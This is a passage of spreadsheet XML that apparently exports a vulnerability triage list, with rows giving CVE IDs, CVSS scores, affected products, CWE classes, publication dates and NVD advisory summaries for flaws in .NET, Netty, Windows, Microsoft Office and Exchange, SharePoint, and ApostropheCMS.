      </c>
    </row>
    <row r="1514">
      <c r="A1514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58649</t>
        </is>
      </c>
      <c r="C1514" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1514" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1514" s="5" t="inlineStr"/>
      <c r="F1514" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1514" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1514" s="5" t="inlineStr"/>
      <c r="I1514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1514" s="5" t="inlineStr"/>
      <c r="K1514" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1514" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t>
        </is>
      </c>
    </row>
    <row r="1515">
      <c r="A1515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59903</t>
        </is>
      </c>
      <c r="C1515" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1515" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1515" s="5" t="inlineStr"/>
      <c r="F1515" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1515" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1515" s="5" t="inlineStr"/>
      <c r="I1515" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1515" s="5" t="inlineStr"/>
      <c r="K1515" s="5" t="inlineStr">
        <is>
          <t>CWE-524</t>
        </is>
      </c>
      <c r="L1515" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.http.cors.CorsHandler setVaryHeader replaces application Vary headers such as Authorization or Cookie with Origin, allowing a caching proxy or CDN to reuse authenticated responses across users and disclose sensitive information. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M1515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59903</t>
        </is>
      </c>
    </row>
    <row r="1516">
      <c r="A1516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62762</t>
        </is>
      </c>
      <c r="C1516" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1516" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1516" s="5" t="inlineStr"/>
      <c r="F1516" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1516" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1516" s="5" t="inlineStr"/>
      <c r="I1516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1516" s="5" t="inlineStr"/>
      <c r="K1516" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1516" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t>
        </is>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="C1517" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1517" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1517" s="5" t="inlineStr"/>
      <c r="F1517" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1517" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1517" s="5" t="inlineStr"/>
      <c r="I1517" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1517" s="5" t="inlineStr"/>
      <c r="K1517" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1517" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63667</t>
        </is>
      </c>
      <c r="C1518" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1518" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1518" s="5" t="inlineStr"/>
      <c r="F1518" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1518" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1518" s="5" t="inlineStr"/>
      <c r="I1518" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1518" s="5" t="inlineStr"/>
      <c r="K1518" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1518" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. Prior to 3.6.2, the import-export module in packages/import-export/lib/formats/gzip.js constructs an attachment source path from the attacker-controlled _id, name, and extension fields in aposAttachments.json without ensuring that the resolved path remains under the extracted attachments directory, allowing an authenticated contributor to import a crafted archive, read a host file with an allowed extension, and publish the copied file at an unauthenticated uploads URL. This issue is fixed in version 3.6.2.</t>
        </is>
      </c>
      <c r="M1518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63667</t>
        </is>
      </c>
    </row>
    <row r="1519">
      <c r="A1519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63669</t>
        </is>
      </c>
      <c r="C1519" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1519" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1519" s="5" t="inlineStr"/>
      <c r="F1519" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1519" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1519" s="5" t="inlineStr"/>
      <c r="I1519" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1519" s="5" t="inlineStr"/>
      <c r="K1519" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L1519" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. Prior to 4.32.0, the page module's move() operation fails to enforce the destination parent's _create permission because its oldParent archive condition disables the check for ordinary moves, allowing an authenticated editor or contributor to use _targetId and _position through the page REST update endpoint to move a controlled page into a restricted subtree and make nudgeNewPeers() updateMany re-rank protected sibling pages. This issue is fixed in version 4.32.0.</t>
        </is>
      </c>
      <c r="M1519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63669</t>
        </is>
      </c>
    </row>
    <row r="1520">
      <c r="A1520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64918</t>
        </is>
      </c>
      <c r="C1520" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1520" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1520" s="5" t="inlineStr"/>
      <c r="F1520" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1520" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1520" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1520" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1520" s="5" t="inlineStr"/>
      <c r="K1520" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1520" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t>
        </is>
      </c>
    </row>
    <row r="1521">
      <c r="A1521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68898</t>
        </is>
      </c>
      <c r="C1521" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1521" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1521" s="5" t="inlineStr"/>
      <c r="F1521" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1521" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1521" s="5" t="inlineStr"/>
      <c r="I1521" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1521" s="5" t="inlineStr"/>
      <c r="K1521" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1521" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t>
        </is>
      </c>
    </row>
    <row r="1522">
      <c r="A1522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69267</t>
        </is>
      </c>
      <c r="C1522" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1522" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1522" s="5" t="inlineStr"/>
      <c r="F1522" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1522" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1522" s="5" t="inlineStr"/>
      <c r="I1522" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1522" s="5" t="inlineStr"/>
      <c r="K1522" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L1522" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t>
        </is>
      </c>
    </row>
    <row r="1523">
      <c r="A1523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69297</t>
        </is>
      </c>
      <c r="C1523" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1523" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1523" s="5" t="inlineStr"/>
      <c r="F1523" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1523" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1523" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1523" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1523" s="5" t="inlineStr"/>
      <c r="K1523" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="L1523" s="5" t="inlineStr">
        <is>
          <t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t>
        </is>
      </c>
    </row>
    <row r="1524">
      <c r="A1524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69361</t>
        </is>
      </c>
      <c r="C1524" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1524" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1524" s="5" t="inlineStr"/>
      <c r="F1524" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1524" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1524" s="5" t="inlineStr"/>
      <c r="I1524" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1524" s="5" t="inlineStr"/>
      <c r="K1524" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1524" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t>
        </is>
      </c>
    </row>
    <row r="1525">
      <c r="A1525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69374</t>
        </is>
      </c>
      <c r="C1525" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1525" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1525" s="5" t="inlineStr"/>
      <c r="F1525" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1525" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1525" s="5" t="inlineStr"/>
      <c r="I1525" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1525" s="5" t="inlineStr"/>
      <c r="K1525" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1525" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t>
        </is>
      </c>
    </row>
    <row r="1526">
      <c r="A1526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69375</t>
        </is>
      </c>
      <c r="C1526" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1526" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1526" s="5" t="inlineStr"/>
      <c r="F1526" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1526" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1526" s="5" t="inlineStr"/>
      <c r="I1526" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1526" s="5" t="inlineStr"/>
      <c r="K1526" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1526" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Exchange Server allows an authorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="M1526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69375</t>
        </is>
      </c>
    </row>
    <row r="1527">
      <c r="A1527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69395</t>
        </is>
      </c>
      <c r="C1527" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1527" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1527" s="5" t="inlineStr"/>
      <c r="F1527" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1527" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1527" s="5" t="inlineStr"/>
      <c r="I1527" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1527" s="5" t="inlineStr"/>
      <c r="K1527" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="L1527" s="5" t="inlineStr">
        <is>
          <t>Use of externally-controlled format string in Active Directory Certificate Services (AD CS) allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69395</t>
        </is>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69409</t>
        </is>
      </c>
      <c r="C1528" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1528" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1528" s="5" t="inlineStr"/>
      <c r="F1528" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1528" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1528" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I1528" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1528" s="5" t="inlineStr"/>
      <c r="K1528" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1528" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t>
        </is>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69497</t>
        </is>
      </c>
      <c r="C1529" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1529" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1529" s="5" t="inlineStr"/>
      <c r="F1529" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1529" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1529" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1529" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1529" s="5" t="inlineStr"/>
      <c r="K1529" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1529" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t>
        </is>
      </c>
    </row>
    <row r="1530">
      <c r="A1530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69624</t>
        </is>
      </c>
      <c r="C1530" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1530" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1530" s="5" t="inlineStr"/>
      <c r="F1530" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1530" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1530" s="5" t="inlineStr"/>
      <c r="I1530" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1530" s="5" t="inlineStr"/>
      <c r="K1530" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1530" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Active Directory Certificate Services (AD CS) allows an authorized attacker to perform tampering over a network.</t>
        </is>
      </c>
      <c r="M1530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69624</t>
        </is>
      </c>
    </row>
    <row r="1531">
      <c r="A1531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69626</t>
        </is>
      </c>
      <c r="C1531" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1531" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1531" s="5" t="inlineStr"/>
      <c r="F1531" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1531" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1531" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1531" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1531" s="5" t="inlineStr"/>
      <c r="K1531" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1531" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69626</t>
        </is>
      </c>
    </row>
    <row r="1532">
      <c r="A1532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69636</t>
        </is>
      </c>
      <c r="C1532" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1532" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1532" s="5" t="inlineStr"/>
      <c r="F1532" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1532" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1532" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I1532" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1532" s="5" t="inlineStr"/>
      <c r="K1532" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1532" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t>
        </is>
      </c>
    </row>
    <row r="1533">
      <c r="A1533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69719</t>
        </is>
      </c>
      <c r="C1533" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1533" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1533" s="5" t="inlineStr"/>
      <c r="F1533" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1533" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1533" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1533" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1533" s="5" t="inlineStr"/>
      <c r="K1533" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1533" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t>
        </is>
      </c>
    </row>
    <row r="1534">
      <c r="A1534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69734</t>
        </is>
      </c>
      <c r="C1534" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1534" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1534" s="5" t="inlineStr"/>
      <c r="F1534" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1534" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1534" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1534" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1534" s="5" t="inlineStr"/>
      <c r="K1534" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L1534" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t>
        </is>
      </c>
    </row>
    <row r="1535">
      <c r="A1535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69781</t>
        </is>
      </c>
      <c r="C1535" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1535" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1535" s="5" t="inlineStr"/>
      <c r="F1535" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1535" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1535" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1535" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1535" s="5" t="inlineStr"/>
      <c r="K1535" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1535" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M1535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t>
        </is>
      </c>
    </row>
    <row r="1536">
      <c r="A1536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
